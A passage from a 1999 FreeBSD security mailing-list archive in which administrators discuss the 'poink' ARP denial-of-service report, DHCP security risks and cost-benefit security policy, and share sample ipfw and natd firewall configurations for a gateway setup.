but > > i have not tried it nor seen the effects of it.. post the source up here.. > > Thanks > > > > - -JD- > > > > On Mon, 19 Apr 1999, Robert Watson wrote: > > > > > On Mon, 19 Apr 1999, Chris wrote: > > > > > > > im sure ya'll have heard of poink, an exploit against freebsd/openbsd > > > > machines (these are the boxes i have tested on) it appears to work very > > > > efficiently in killing freebsd 3.1 - freebsd 3.0 machines, against one > of > > > > our freebsd 2.2.5 machines, it did bring up the error messages in > > > > /var/log/messages (arp lookups) but didnt kill the machine like the > > > > others... > > > > > > > > im just wondering if there are any patches for this, and i noticed ther > e > > > > is no mention of it on freebsd's website.... > > > > > > Interestingly, I haven't heard about this one, and it doesn't appear to b > e > > > on rootshell, etc. The only "poink" I could find reference to was an > > > alternative ping program that doesn't require root access--I assume that > > > means it uses udp or something to try and get a response (perhaps looking > > > for a connection refused ICMP except on the socket?). I may just have > > > missed it in passing, of course, given the vast quantities of email that > > > go through around here :-). > > > > > > Since it doesn't appear to have been reported, send a copy of the source > > > to security-officer@freebsd.org, and feel free to CC me a copy so I can > > > take a look. > > > > > > Robert N Watson > > > > > > robert@fledge.watson.org http://www.watson.org/~robert/ > > > PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 > > > > > > Carnegie Mellon University http://www.cmu.edu/ > > > TIS Labs at Network Associates, Inc. http://www.tis.com/ > > > Safeport Network Services http://www.safeport.com/ > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > -----BEGIN PGP SIGNATURE----- > > Version: PGPfreeware 5.0i for non-commercial use > > Charset: noconv > > > > iQA/AwUBNxtibtGMB8VPlu8bEQJ/rgCgp469vqIP+XvUBt8E6p+eWv8kM9YAoJVE > > JPNHwoC9dFTZuubRq8AxjIej > > =neIQ > > -----END PGP SIGNATURE----- > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 20 6:43: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.rdc1.sdca.home.com (ha1.rdc1.sdca.home.com [24.0.3.66]) by hub.freebsd.org (Postfix) with ESMTP id 10F9914FEA for ; Tue, 20 Apr 1999 06:43:03 -0700 (PDT) (envelope-from jay@doscher.com) Received: from [192.168.200.3] ([24.4.93.129]) by mail.rdc1.sdca.home.com (InterMail v4.00.03 201-229-104) with ESMTP id <19990420134037.PXIG6760.mail.rdc1.sdca.home.com@[24.4.93.129]> for ; Tue, 20 Apr 1999 06:40:37 -0700 X-Mailer: Microsoft Outlook Express Macintosh Edition - 4.5 (0410) Date: Tue, 20 Apr 1999 06:45:59 -0800 Subject: Sample Ipfw scripts? From: "Jay Doscher" To: security@FreeBSD.ORG Mime-version: 1.0 X-Priority: 3 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Message-Id: <19990420134037.PXIG6760.mail.rdc1.sdca.home.com@[24.4.93.129]> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Does anyone have any sample IPfw scripts they would be willing to share? I'm setting up ipfw for the first time (currently using linux) on a freebsd machine and it's a bit confusing :) Thanks. Jay Doscher jay@doscher.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 20 6:46:18 1999 Delivered-To: freebsd-security@freebsd.org Received: from 2.hot.cl (node1e2d.a2000.nl [62.108.30.45]) by hub.freebsd.org (Postfix) with ESMTP id AA17814FEA for ; Tue, 20 Apr 1999 06:46:14 -0700 (PDT) (envelope-from niels@hot.cl) Received: from localhost (niels@localhost) by 2.hot.cl (8.8.8/HOTCL) with ESMTP id PAA29604; Tue, 20 Apr 1999 15:43:14 +0200 (CEST) (envelope-from niels@hot.cl) Date: Tue, 20 Apr 1999 15:43:13 +0200 (CEST) From: Niels Kroon To: Jay Doscher Cc: security@FreeBSD.ORG Subject: Re: Sample Ipfw scripts? In-Reply-To: <19990420134037.PXIG6760.mail.rdc1.sdca.home.com@[24.4.93.129]> Message-ID: X-Location: Amsterdam The Netherlands MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 20 Apr 1999, Jay Doscher wrote: > Does anyone have any sample IPfw scripts they would be willing to share? > I'm setting up ipfw for the first time (currently using linux) on a freebsd > machine and it's a bit confusing :) Thanks. > > Jay Doscher > jay@doscher.com check http://www.freebsd.org/~jkb/howto.html it has a link to a site with sample configs Niels To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 20 7:27:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from maild.telia.com (maild.telia.com [194.22.190.3]) by hub.freebsd.org (Postfix) with ESMTP id 4B7B01578E for ; Tue, 20 Apr 1999 07:27:07 -0700 (PDT) (envelope-from thomas.uhrfelt@plymovent.se) Received: from d1o68.telia.com (root@d1o68.telia.com [62.20.138.241]) by maild.telia.com (8.8.8/8.8.8) with ESMTP id QAA09078; Tue, 20 Apr 1999 16:24:38 +0200 (CEST) Received: from tu (t1o68p22.telia.com [62.20.138.22]) by d1o68.telia.com (8.8.8/8.8.5) with SMTP id QAA11737; Tue, 20 Apr 1999 16:24:37 +0200 (CEST) Received: by localhost with Microsoft MAPI; Tue, 20 Apr 1999 16:20:43 +0200 Message-ID: <01BE8B49.BD40B300.thomas.uhrfelt@plymovent.se> From: Thomas Uhrfelt Reply-To: "thomas.uhrfelt@plymovent.se" To: "'Jay Doscher'" Cc: "'freebsd-security@freebsd.org'" Subject: SV: Sample Ipfw scripts? Date: Tue, 20 Apr 1999 16:15:36 +0200 Organization: Plymovent AB X-Mailer: Microsoft Internet-e-post/MAPI - 8.0.0.4211 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org You might want to take a look at the FreeBSD IPFW Config page below, but I don't think the scripts are very good, so if you find a better source, be sure to send it to me aswell *hint hint* Regards, Thomas Uhrfelt http://www.metronet.com/~pgilley/freebsd/ipfw/ > Does anyone have any sample IPfw scripts they would be willing to share? > I'm setting up ipfw for the first time (currently using linux) on a freebsd > machine and it's a bit confusing :) Thanks. > > Jay Doscher > jay@doscher.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 20 7:57:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from trooper.velocet.ca (trooper.velocet.net [209.167.225.226]) by hub.freebsd.org (Postfix) with ESMTP id E551014E59 for ; Tue, 20 Apr 1999 07:57:53 -0700 (PDT) (envelope-from dgilbert@trooper.velocet.ca) Received: (from dgilbert@localhost) by trooper.velocet.ca (8.8.7/8.8.7) id KAA28930; Tue, 20 Apr 1999 10:55:23 -0400 (EDT) From: David Gilbert MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14108.38235.254919.924353@trooper.velocet.ca> Date: Tue, 20 Apr 1999 10:55:23 -0400 (EDT) To: "Harry M. Leitzell" Cc: "Frederick J Polsky v1.0" , security@FreeBSD.ORG Subject: Re: poink attack (was Re: ARP problem in Windows9X/NT) In-Reply-To: References: X-Mailer: VM 6.71 under 20.4 "Emerald" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >>>>> "Harry" == Harry M Leitzell writes: Harry> It also hits college campuses, which are a haven for Harry> misconfigured Linux machines that provide easy quick root Harry> access on the Local network. Not to say that CMU has this Harry> problem or anything like that. Not this discussion 'should' be about what 'should' be, but wouldn't it make sense to have the DHCP server be the 'athority' by which hardware addresses are resolved? I suppose there's little security built into that protocol, too. We recently went to implement it for a customer and were somewhat taken aback by what could happen if someone managed to just 'connect' a laptop to the network who wasn't supposed to. Dave. -- ============================================================================ |David Gilbert, Velocet Communications. | Two things can only be | |Mail: dgilbert@velocet.net | equal if and only if they | |http://www.velocet.net/~dgilbert | are precisely opposite. | =========================================================GLO================ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 20 8:17:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id EEDE61579B for ; Tue, 20 Apr 1999 08:17:33 -0700 (PDT) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.9.3/8.8.8) id LAA09694; Tue, 20 Apr 1999 11:15:07 -0400 (EDT) (envelope-from cjc) From: "Crist J. Clark" Message-Id: <199904201515.LAA09694@cc942873-a.ewndsr1.nj.home.com> Subject: DHCP (was Re: poink attack (was Re: ARP problem in Windows9X/NT)) In-Reply-To: <14108.38235.254919.924353@trooper.velocet.ca> from David Gilbert at "Apr 20, 99 10:55:23 am" To: dgilbert@velocet.ca (David Gilbert) Date: Tue, 20 Apr 1999 11:15:07 -0400 (EDT) Cc: Harry_M_Leitzell@cmu.edu, fred@fredbox.com, security@FreeBSD.ORG Reply-To: cjclark@home.com X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org David Gilbert wrote, > Not this discussion 'should' be about what 'should' be, but wouldn't > it make sense to have the DHCP server be the 'athority' by which > hardware addresses are resolved? I suppose there's little security > built into that protocol, too. We recently went to implement it for a > customer and were somewhat taken aback by what could happen if someone > managed to just 'connect' a laptop to the network who wasn't supposed > to. OK, I'll bite. What happens when someone who is not supposed to connects to a DHCP served network? (Besides that they are connected to the network and are not supposed to be.) -- Crist J. Clark cjclark@home.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 20 8:40:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from trooper.velocet.ca (trooper.velocet.net [209.167.225.226]) by hub.freebsd.org (Postfix) with ESMTP id 71D2E15774 for ; Tue, 20 Apr 1999 08:40:16 -0700 (PDT) (envelope-from dgilbert@trooper.velocet.ca) Received: (from dgilbert@localhost) by trooper.velocet.ca (8.8.7/8.8.7) id LAA29968; Tue, 20 Apr 1999 11:37:44 -0400 (EDT) From: David Gilbert MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14108.40776.605720.29036@trooper.velocet.ca> Date: Tue, 20 Apr 1999 11:37:44 -0400 (EDT) To: cjclark@home.com Cc: dgilbert@velocet.ca (David Gilbert), Harry_M_Leitzell@cmu.edu, fred@fredbox.com, security@FreeBSD.ORG Subject: DHCP (was Re: poink attack (was Re: ARP problem in Windows9X/NT)) In-Reply-To: <199904201515.LAA09694@cc942873-a.ewndsr1.nj.home.com> References: <14108.38235.254919.924353@trooper.velocet.ca> <199904201515.LAA09694@cc942873-a.ewndsr1.nj.home.com> X-Mailer: VM 6.71 under 20.4 "Emerald" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >>>>> "Crist" == Crist J Clark writes: Crist> OK, I'll bite. Crist> What happens when someone who is not supposed to connects to a Crist> DHCP served network? (Besides that they are connected to the Crist> network and are not supposed to be.) -- Crist J. Clark Crist> cjclark@home.com It just lowers the bar. To attach oneself usefully to a foreign IP network requires some experimentation and/or packet sniffing. On a DHCP network, it's just plug and pray. I suppose it's the difference between running Linux which every script kiddie plays with vs. running FreeBSD (little harder) or HpUX (reasonably obscure). I'm certainly not one to believe in security by obscurity --- not at least against a knowledgeable attacker. However, there is a coorelation between the number of breakins on hosts we (Velocet) monitor and that hosts representative population. DG/UX is likely holey as swiss cheeze, but rootshell doesn't have a 'sploit for it. Back to the origional issue: Joe _average_ salesman is sitting in the boardroom... which has a network jack. He's left alone for 30 minutes for one reason or another. He plugs in. Without _any_ knowledge, he's up and running. Of course, if Joe were a hacker worth his salt, this wouldn't be a barrier --- but the likelyhood of Joe being a hacker is small. I think there's a definate range of security issues --- and I think it's rediculus for most companies to take the standard 'stance' that they must protect themselves against all perils (why then have they not started filtering for whatever that substance is that kills hard drives in a week if it's in the air) on the net. Things range from 'something anyone can do from the other side of the world from a Win95 machine' to 'something a black-belt hacker could do with arbitrary equipment in my machine room' --- an obvious policy is to allocate time/money to security that has the cost/benifit ratio that you choose. Dave. -- ============================================================================ |David Gilbert, Velocet Communications. | Two things can only be | |Mail: dgilbert@velocet.net | equal if and only if they | |http://www.velocet.net/~dgilbert | are precisely opposite. | =========================================================GLO================ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 20 8:44:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 906AE150A8 for ; Tue, 20 Apr 1999 08:44:01 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id LAA27728; Tue, 20 Apr 1999 11:41:04 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Tue, 20 Apr 1999 11:41:03 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: cjclark@home.com Cc: David Gilbert , Harry_M_Leitzell@cmu.edu, fred@fredbox.com, security@FreeBSD.ORG Subject: Re: DHCP (was Re: poink attack (was Re: ARP problem in Windows9X/NT)) In-Reply-To: <199904201515.LAA09694@cc942873-a.ewndsr1.nj.home.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 20 Apr 1999, Crist J. Clark wrote: > David Gilbert wrote, > > Not this discussion 'should' be about what 'should' be, but wouldn't > > it make sense to have the DHCP server be the 'athority' by which > > hardware addresses are resolved? I suppose there's little security > > built into that protocol, too. We recently went to implement it for a > > customer and were somewhat taken aback by what could happen if someone > > managed to just 'connect' a laptop to the network who wasn't supposed > > to. > > OK, I'll bite. > > What happens when someone who is not supposed to connects to a DHCP > served network? (Besides that they are connected to the network and are > not supposed to be.) Well, the quick answer would be denial of service. I was on the DHCP security working group for a while, and my conclusion was really that there is no good answer; you can sort of do something if you have really smart programmable switches, but that sort of violates the "they manage to just connect..." assertion. With crypto extensions, you can prevent the server from allocating resources it shouldn't, and you can generate an audit trail for the client in the event of spoofing (although you might not notice it). In the end, denial of service attacks are not something you can control in this environment unless you can make guarantees about the medium. As long as crypto is used for all other applications and your software is right, it doesn't go much beyond that, however. Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 20 13:33: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 63C4215024 for ; Tue, 20 Apr 1999 13:33:00 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id NAA05585; Tue, 20 Apr 1999 13:28:57 -0700 (PDT) Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id NAA22198; Tue, 20 Apr 1999 13:28:42 -0700 Received: from softweyr.com (dyn5.utah.xylan.com) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA16303; Tue, 20 Apr 99 13:28:37 PDT Message-Id: <371CE376.FDED01D5@softweyr.com> Date: Tue, 20 Apr 1999 14:28:38 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en Mime-Version: 1.0 To: David Gilbert Cc: cjclark@home.com, Harry_M_Leitzell@cmu.edu, fred@fredbox.com, security@FreeBSD.ORG Subject: Re: DHCP (was Re: poink attack (was Re: ARP problem in Windows9X/NT)) References: <14108.38235.254919.924353@trooper.velocet.ca> <199904201515.LAA09694@cc942873-a.ewndsr1.nj.home.com> <14108.40776.605720.29036@trooper.velocet.ca> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org David Gilbert wrote: > > >>>>> "Crist" == Crist J Clark writes: > > Crist> OK, I'll bite. > > Crist> What happens when someone who is not supposed to connects to a > Crist> DHCP served network? (Besides that they are connected to the > Crist> network and are not supposed to be.) -- Crist J. Clark > Crist> cjclark@home.com > > It just lowers the bar. To attach oneself usefully to a foreign IP > network requires some experimentation and/or packet sniffing. On a > DHCP network, it's just plug and pray. I suppose it's the difference > between running Linux which every script kiddie plays with vs. running > FreeBSD (little harder) or HpUX (reasonably obscure). > > I'm certainly not one to believe in security by obscurity --- not at > least against a knowledgeable attacker. However, there is a > coorelation between the number of breakins on hosts we (Velocet) > monitor and that hosts representative population. > > DG/UX is likely holey as swiss cheeze, but rootshell doesn't have a > 'sploit for it. > > Back to the origional issue: Joe _average_ salesman is sitting in the > boardroom... which has a network jack. He's left alone for 30 minutes > for one reason or another. He plugs in. Without _any_ knowledge, > he's up and running. Of course, if Joe were a hacker worth his salt, > this wouldn't be a barrier --- but the likelyhood of Joe being a > hacker is small. > > I think there's a definate range of security issues --- and I think > it's rediculus for most companies to take the standard 'stance' that > they must protect themselves against all perils As Rob Clyde used to point out, of the security measure put in place cost more than the potential loss, you've absolutely lost money. All "reasonable" security is to implement the most effective, least expensive security measures and then keep going until your systems (and networks) are "secure enough." -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 20 14:46: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from metronet.com (fohnix.metronet.com [192.245.137.2]) by hub.freebsd.org (Postfix) with SMTP id BD78914BF5 for ; Tue, 20 Apr 1999 14:45:54 -0700 (PDT) (envelope-from pgilley@metronet.com) Received: from localhost by metronet.com with SMTP id AA15939 (5.67a/IDA1.5hp for ); Tue, 20 Apr 1999 16:43:03 -0500 Date: Tue, 20 Apr 1999 16:43:01 -0500 (CDT) From: Phil Gilley To: Thomas Uhrfelt Cc: freebsd-security@freebsd.org Subject: Re: SV: Sample Ipfw scripts? In-Reply-To: <01BE8B49.BD40B300.thomas.uhrfelt@plymovent.se> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 20 Apr 1999, Thomas Uhrfelt wrote: > You might want to take a look at the FreeBSD IPFW Config page below, but I > don't think the scripts are very good, Then send me some better ones to add to the page. :-) I make very limited use of ipfw. I created the ipfw page because of frequent posts like the one earlier and because when I first started using ipfw the only examples I could find were in /etc/rc.firewall. I was hoping to gather some more complex examples for people to learn from. Does anyone care to show off what they're doing with ipfw? Phil Gilley pgilley@metronet.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 20 15:17:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from vidnt2.hq.vid-h2o.org (vista2-blk1-hfc-0251-d1db0de8.rdc1.sdca.coxatwork.com [209.219.13.232]) by hub.freebsd.org (Postfix) with ESMTP id 7198914EAB for ; Tue, 20 Apr 1999 15:17:55 -0700 (PDT) (envelope-from JDoscher@vid-h2o.org) Received: by VIDNT2 with Internet Mail Service (5.5.2232.9) id ; Tue, 20 Apr 1999 15:18:13 -0700 Message-ID: From: Jay Doscher To: "'security@freebsd.org'" Subject: Some decent Ipfw scripts Date: Tue, 20 Apr 1999 15:17:51 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2232.9) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org That's what I was asking for really. I was hoping that someone would be willing to show off some cool uses for the ipfw scripts, but I have also seen the samples on the machine and was hoping for some good ones. Jay Doscher -----Original Message----- From: Phil Gilley > To: Thomas Uhrfelt > Cc: freebsd-security@FreeBSD.ORG > Date: Tuesday, April 20, 1999 2:44 PM Subject: Re: SV: Sample Ipfw scripts? >On Tue, 20 Apr 1999, Thomas Uhrfelt wrote: > >> You might want to take a look at the FreeBSD IPFW Config page below, but I >> don't think the scripts are very good, > >Then send me some better ones to add to the page. :-) > >I make very limited use of ipfw. I created the ipfw page because >of frequent posts like the one earlier and because when I first >started using ipfw the only examples I could find were in >/etc/rc.firewall. I was hoping to gather some more complex examples >for people to learn from. Does anyone care to show off what they're >doing with ipfw? > >Phil Gilley >pgilley@metronet.com > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message Jay Doscher Information Systems Assistant Phone<760.806.3172> Fax<760.806.3072> PGP Signature File ftp://mp3.doscher.com/tools/public_key.asc To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 20 21:30:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from athena.connectalk.com (athena.connectalk.com [204.19.165.45]) by hub.freebsd.org (Postfix) with ESMTP id 29B8B15083 for ; Tue, 20 Apr 1999 21:30:42 -0700 (PDT) (envelope-from bgallant@ConnecTalk.com) Received: from atlantis.connectalk.com ([172.16.0.67]) by athena.connectalk.com (Netscape Messaging Server 3.6) with ESMTP id AAA426F; Wed, 21 Apr 1999 00:26:22 -0400 Date: Wed, 21 Apr 1999 00:30:51 -0400 (EDT) From: "Bruno Gallant" To: Phil Gilley Cc: freebsd-security@freebsd.org Subject: Re: SV: Sample Ipfw scripts? In-Reply-To: Message-ID: Approved: Just another sysadmin MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org We had a client a couple of months ago that wanted to be connected to the internet. They had an IBM F50 as their financial server. They wanted to also have Lotus Domino installed on it, to control email, among other things. They also have salesmen in the US and Canada, logging from their own providers to access their Lotus databases. And they wanted security, obviously. We installed FreeBSD 2.2.8 on an IBM Netfinity as the gateway, and used the ipfw to block every port, except 22, 25, 1352, which stands, as you know, for ssh, smtp and lotusnote. The F50 is obviously behind the gateway, so we used natd to redirect the ports 25 and 1352 to the internal machine. In effect, if you would telnet 1352, the F50 would answer, not the gateway. We also restricted ssh connections to those coming from our company's subnet, since our client does not have IT personnel on site, we maintain their network. So here's what I did (dummy addresses): the F50 is 192.168.1.2; the gateway is 789.456.123.111; our corporate subnet is: 123.456.789.0/24; xl0 is the external interface; fxp0 is the internal interface. In the rc.firewall, in the "simple" section I added: $fwcmd add 155 allow tcp from any to 192.168.1.2 25 via xl0 $fwcmd add 157 allow tcp from any to 192.168.1.2 1352 via xl0 $fwcmd add 155 allow ip from any to any via fxp0 $fwcmd add 175 allow tcp from 123.456.789.0/24 to 789.456.123.111 22 In the rc.conf, and that's where the magic is, we edited the following line: natd_flags="-redirect_port tcp 192.168.1.2:25 25 -redirect_port tcp 192.168.1.2:1352 1352" # Additional flags for natd. So what basically happens is that if a packet arrives for the port 1352 on the gateway, it hits the divert rule, where natd recognize that it has to change the destination address to the F50's but keeping the same port, and put the packet back in the rule stack, and so it hits rule 157, and goes through. natd remembers where the packet comes from in its internal database, so there is no problem for the replies going back to the originator. It's more of a natd issue, true enough, but since natd cannot work without ipfw... From this example, you can create quite crazy configurations, where accessing port 25 on one machine could end up in port 100 in another. Don't know if it's a good example or not, but it solved our problem neatly. On Tue, 20 Apr 1999, Phil Gilley wrote: > Date: Tue, 20 Apr 1999 16:43:01 -0500 (CDT) > From: Phil Gilley > To: Thomas Uhrfelt > Cc: freebsd-security@freebsd.org > Subject: Re: SV: Sample Ipfw scripts? > > On Tue, 20 Apr 1999, Thomas Uhrfelt wrote: > > > You might want to take a look at the FreeBSD IPFW Config page below, but I > > don't think the scripts are very good, > > Then send me some better ones to add to the page. :-) > > I make very limited use of ipfw. I created the ipfw page because > of frequent posts like the one earlier and because when I first > started using ipfw the only examples I could find were in > /etc/rc.firewall. I was hoping to gather some more complex examples > for people to learn from. Does anyone care to show off what they're > doing with ipfw? > > Phil Gilley > pgilley@metronet.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > ------------------+----------------------------------------------------------- Bruno Gallant | All wars are civil wars, because all men are brothers ... System Integrator | Each one owes infinitely more to the human race than to ConnecTalk | the particular country in which he was born. (514)856-3060 | -- Francois Fenelon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 21 1: 2:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from mailg.telia.com (mailg.telia.com [194.22.194.26]) by hub.freebsd.org (Postfix) with ESMTP id D55421574C for ; Wed, 21 Apr 1999 01:02:19 -0700 (PDT) (envelope-from thomas.uhrfelt@plymovent.se) Received: from d1o68.telia.com (root@d1o68.telia.com [62.20.138.241]) by mailg.telia.com (8.8.5/8.8.8) with ESMTP id JAA02773; Wed, 21 Apr 1999 09:59:50 +0200 (CEST) Received: from tu (t4o68p101.telia.com [62.20.139.221]) by d1o68.telia.com (8.8.8/8.8.5) with SMTP id JAA17342; Wed, 21 Apr 1999 09:59:48 +0200 (CEST) Received: by localhost with Microsoft MAPI; Wed, 21 Apr 1999 09:56:40 +0200 Message-ID: <01BE8BDD.40E22BB0.thomas.uhrfelt@plymovent.se> From: Thomas Uhrfelt Reply-To: "thomas.uhrfelt@plymovent.se" To: "'Phil Gilley'" Cc: "'freebsd-security@freebsd.org'" Subject: SV: SV: Sample Ipfw scripts? Date: Wed, 21 Apr 1999 09:50:04 +0200 Organization: Plymovent AB X-Mailer: Microsoft Internet-e-post/MAPI - 8.0.0.4211 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This was most certainly not an attack on you as a person, in fact it wasnt an attack at all, just a mere observation. I would be glad to send you mine (when completed, and if it gets "good). I just figured since it's a widely used program, there oughta be more well-thought-through and well structured configurations files out there. I am looking, and if/when I find some good ones I'll be sure to send you them. Regards, Thomas > On Tue, 20 Apr 1999, Thomas Uhrfelt wrote: > > > You might want to take a look at the FreeBSD IPFW Config page below, but I > > > > don't think the scripts are very good, > > Then send me some better ones to add to the page. :-) > > I make very limited use of ipfw. I created the ipfw page because > of frequent posts like the one earlier and because when I first > started using ipfw the only examples I could find were in > /etc/rc.firewall. I was hoping to gather some more complex examples > for people to learn from. Does anyone care to show off what they're > doing with ipfw? > > Phil Gilley > pgilley@metronet.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 21 6: 4:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from metronet.com (fohnix.metronet.com [192.245.137.2]) by hub.freebsd.org (Postfix) with SMTP id C417C152CD for ; Wed, 21 Apr 1999 06:04:39 -0700 (PDT) (envelope-from pgilley@metronet.com) Received: from localhost by metronet.com with SMTP id AA22360 (5.67a/IDA1.5hp for ); Wed, 21 Apr 1999 08:01:43 -0500 Date: Wed, 21 Apr 1999 08:01:42 -0500 (CDT) From: Phil Gilley To: Thomas Uhrfelt Cc: freebsd-security@freebsd.org Subject: Re: SV: SV: Sample Ipfw scripts? In-Reply-To: <01BE8BDD.40E22BB0.thomas.uhrfelt@plymovent.se> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 21 Apr 1999, Thomas Uhrfelt wrote: > This was most certainly not an attack on you as a person, in fact it wasnt an > attack at all, just a mere observation. I would be glad to send you mine > (when completed, and if it gets "good). I just figured since it's a widely > used program, there oughta be more well-thought-through and well structured > configurations files out there. I am looking, and if/when I find some good > ones I'll be sure to send you them. It wasn't taken as an attack. I used your post as an opportunity to solicit more examples and have received a few as a result. They will be added to the page in the next day or so. Phil Gilley pgilley@metronet.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 21 10:35:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from trooper.velocet.ca (trooper.velocet.net [209.167.225.226]) by hub.freebsd.org (Postfix) with ESMTP 